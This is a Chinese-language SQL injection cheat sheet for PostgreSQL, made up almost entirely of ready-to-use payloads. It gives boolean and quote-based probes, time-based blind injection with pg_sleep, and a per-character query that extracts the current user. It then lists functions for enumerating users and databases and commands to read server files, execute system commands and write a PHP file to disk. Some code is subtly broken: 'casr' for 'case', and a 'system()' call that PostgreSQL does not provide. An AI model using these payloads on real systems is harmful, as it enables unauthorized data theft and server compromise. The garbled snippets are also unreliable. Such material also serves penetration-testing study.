关于PostgreSQL的SQL注入必知必会

一、postgresql简介

postgresql是一款关系型数据库，广泛应用在web编程当中，由于其语法与MySQL不尽相同，所以其SQL注入又自成一派。

二、postgresql的SQL注入：（注意注释符号--+）

1、简单的有回显的SQL注入不用多说，还是基本的SQL语句直接查询就可以了。

 #简单的payload
 parameter = 2-1
 parameter = 1 and 1 = 2
 parameter = 1 or 1 = 2-1
 parameter = 1' and '1'='1#and -> or
 parameter = 1' and '1'='2#and -> or

或者引号区分发（适用于字符串）

 parameter = 1    #Success
 parameter = 1'   #Failed
 parameter = 1''  #Success

2、一般的基于时间的盲注，可以参考下面的办法：

 #postgresql 的几个简单判断payload：
 parameter=1;select pg_sleep(5)
 parameter=1';select pg_sleep(5)
 parameter=1');select pg_sleep(5)
 parameter=1);select pg_sleep(5)
 parameter=1));select pg_sleep(5)
 parameter=select pg_sleep(5)

盲注的逐位猜解

 SELECT CASE WHEN (COALESCE(ASCII(SUBSTR(({current_user}),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+

3、常见的函数查看一些基本信息：

 SELECT version() #查看版本信息
 #查看用户
 SELECT user;
 SELECT current_user;
 SELECT session_user;
 SELECT usename FROM pg_user;#这里是usename不是username
 SELECT getpgusername();
 #查看当前数据库
 SELECT current_database()

4、postgresql下的if

 #mysql的
 if(expr1,result1,result2);
 #如果expr1满足，result1，否则result2
 
 #对于postgresql
 select case when(expr1) then result1 else result2 end;
 
 #举个例子
 select casr when(current_user='postgres') then pg_sleep(5) else pg_sleep(0) end;

5、其他

（1）读取文件：

 select pg_read_file(filepath+filename);

（2）执行命令:

 select system("comamnd_string");

（3）写入文件：

 COPY (select '<?php phpinfo();?>') to '/tmp/1.php';